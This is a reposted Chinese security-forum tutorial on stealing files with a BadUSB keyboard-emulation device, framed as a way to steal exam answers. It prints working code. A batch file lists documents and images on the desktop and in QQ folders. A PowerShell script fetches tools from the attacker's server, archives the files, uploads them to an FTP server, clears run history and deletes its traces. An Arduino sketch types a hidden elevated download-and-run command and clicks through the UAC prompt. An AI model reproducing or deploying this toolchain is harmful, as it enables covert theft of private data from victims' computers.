刺球网络安全社区

 找回密码
 立即注册

新浪微博登陆

只需一步, 快速开始

QQ登录

只需一步,快速开始

搜索
查看: 1149|回复: 2

【转】如何用Badusb快速窃取资料

[复制链接]

 成长值: 215966

新浪微博达人勋

  • TA的每日心情

    2019-8-22 09:24
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    1134

    主题

    1717

    帖子

    37万

    积分

    管理员

    技术指数:★★★★★

    Rank: 9Rank: 9Rank: 9

    积分
    376199

    社区QQ达人最佳新人活跃会员热心会员推广达人宣传达人灌水之王突出贡献优秀版主荣誉管理论坛元老

    QQ
    发表于 2016-4-7 06:26:07 | 显示全部楼层 |阅读模式
    如何用Badusb快速窃取资料
    [绕过杀软,绕过UAC,绕过防火墙,绕不过LZ直播吃翔]
    演示视频:http://v.qq.com/page/t/6/1/t0191xfj861.html
    143413y604ubqu75u54h6z.jpg

    0×01 引言

    又到了期中考试了,我又要去偷答案了,一直发现远程下载运行exe的方式不太好,容易报毒所以这里打算用ps脚本。



    0×02 关于HID

    HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。



    0×03 准备工具

    一台外网主机(直接电脑接网线宽带拨号也可以)

    一个HID攻击工具(烧鹅或者Badusb)

    FTPserver(搭建一个FTP服务器用来接收窃取到的文件)

    PHPstudy(搭建http服务器用来存放ps脚本等)

    7z.exe / 7z.dll(存放到http服务器下,之后会利用它来进行压缩后在上传,尽量减小上传速度)



    0×04 代码部分(以下代码可能具有攻击性,请勿用于非法用途)

    1.[get.bat](获取需要的文件存放位置,并保存到c:\temp.bat)[该代码存放于服务器http根目录下]

    1. dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.bat
    2. dir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.bat
    3. dir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.bat
    4. dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
    5. dir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.bat
    6. dir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.bat
    7. dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
    8. dir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.bat
    9. dir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.bat
    10. dir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.bat
    11. dir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.bat
    12. dir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.bat
    13. dir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.bat
    14. dir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.bat
    15. dir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.bat
    16. dir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.bat
    17. dir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.bat
    18. dir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.bat
    19. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.bat
    20. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.bat
    21. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.bat
    22. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
    23. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.bat
    24. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.bat
    25. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
    26. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.bat
    27. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.bat
    28. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.bat
    29. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.bat
    30. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.bat
    31. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.bat
    32. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.bat
    33. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.bat
    34. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.bat
    35. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.bat
    36. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat
    复制代码
    2.[get.ps1](清除运行记录,下载服务器中的7z.dll / 7z.exe / get.bat到c盘到相应位置,处理c:\temp.bat为7z压缩为c:\Ram.7z,上传c:\Ram.7z到FTP服务器根目录下,删除所有下载的文件!!!一共需要改4处IP地址!!!)[该代码存放于服务器http根目录下记得设置FTP服务器密码为admin admin]
    1. reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;
    2. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');
    3. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');
    4. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');
    5. C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;
    6. $fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");
    7. $ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)
    8. $ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
    9. $ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")
    10. $ftp.UseBinary = $true
    11. $ftp.UsePassive = $true
    12. $content = [System.IO.File]::ReadAllBytes($fileInf.fullname)
    13. $ftp.ContentLength = $content.Length
    14. $rs = $ftp.GetRequestStream()
    15. $rs.Write($content, 0, $content.Length)
    16. $rs.Close()
    17. $rs.Dispose()
    18. Remove-Item c:\temp.bat
    19. Remove-Item c:\Ram.*
    20. Remove-Item c:\7z.*
    21. Remove-Item c:\Users\Public\get.*
    复制代码

    3.[get.ino](以管理员权限下载get.ps1到本地c:\users\public目录!!!需要改1处IP地址!!!UAC闪过之后要记得拔出)[修改IP后直接刷入]

    1. void setup() {//初始化
    2.   Keyboard.begin();//开始键盘通讯
    3.   delay(5000);//延时
    4.   Keyboard.press(KEY_LEFT_GUI);//win键
    5.   delay(500);
    6.   Keyboard.press('r');//r键
    7.   delay(500);
    8.   Keyboard.release(KEY_LEFT_GUI);
    9.   Keyboard.release('r');
    10.   Keyboard.press(KEY_CAPS_LOCK);
    11.   Keyboard.release(KEY_CAPS_LOCK);
    12.   delay(500);
    13.   Keyboard.println("POWERSHELL -NOP");
    14.   delay(800);
    15.   Keyboard.println();
    16.   delay(800);
    17.   Keyboard.println("START-PROCESS -fILEpATH POWERSHELL " -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT" -vERB RUNAS;EXIT");
    18.   Keyboard.press(KEY_CAPS_LOCK);
    19.   Keyboard.release(KEY_CAPS_LOCK);
    20.   Keyboard.end();//结束键盘通讯
    21. }
    22. void loop()//循环
    23. {
    24.   Keyboard.release(KEY_LEFT_ALT);
    25.   Keyboard.press(KEY_LEFT_ALT);
    26.   Keyboard.print('y');
    27.   Keyboard.release(KEY_LEFT_ALT);
    28.   Keyboard.release(KEY_LEFT_ALT);
    29.   Keyboard.release(KEY_LEFT_ALT);
    30.   Keyboard.release(KEY_LEFT_ALT);
    31.   delay(50);
    32. }
    复制代码
    打包下载:链接: http://pan.baidu.com/s/1hsQ2db2
    密码:
    游客,如果您要查看本帖隐藏内容请回复







    楼主热帖
    回复

    使用道具 举报

    新浪微博达人勋

    该用户从未签到

    3

    主题

    27

    帖子

    141

    积分

    注册会员

    Rank: 2

    积分
    141

    社区QQ达人

    发表于 2016-6-10 18:37:52 | 显示全部楼层
    11111111

    回复

    使用道具 举报

    新浪微博达人勋

  • TA的每日心情
    无聊
    2019-8-1 04:31
  • 签到天数: 1 天

    [LV.1]初来乍到

    1

    主题

    5

    帖子

    27

    积分

    新手上路

    Rank: 1

    积分
    27

    社区QQ达人

    发表于 2019-8-1 05:45:14 | 显示全部楼层
    我只是路过打酱油的,顺便学习学习

    [发帖际遇]: 一个袋子砸在了 好久未见 头上,好久未见 赚了 2 金球. 幸运榜 / 衰神榜
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆

    本版积分规则

    
     
     
    技术支持
    点击这里给我发消息
    在线客服
    点击这里给我发消息
    点击这里给我发消息
    刺球网安群①:
    刺球网安社区交流群①
    在线时间:
    8:30-21:00
     

    刺球网安 渝公网安备 50011402500080号 ( 渝ICP备15001097号-1 )申请友链|小黑屋| 刺球网络安全社区

    GMT, 2019-10-16 14:42 , Processed in 0.243480 second(s), 52 queries , Gzip On.

    Powered by 刺球网安

    © 2014-2025

    快速回复 返回顶部 返回列表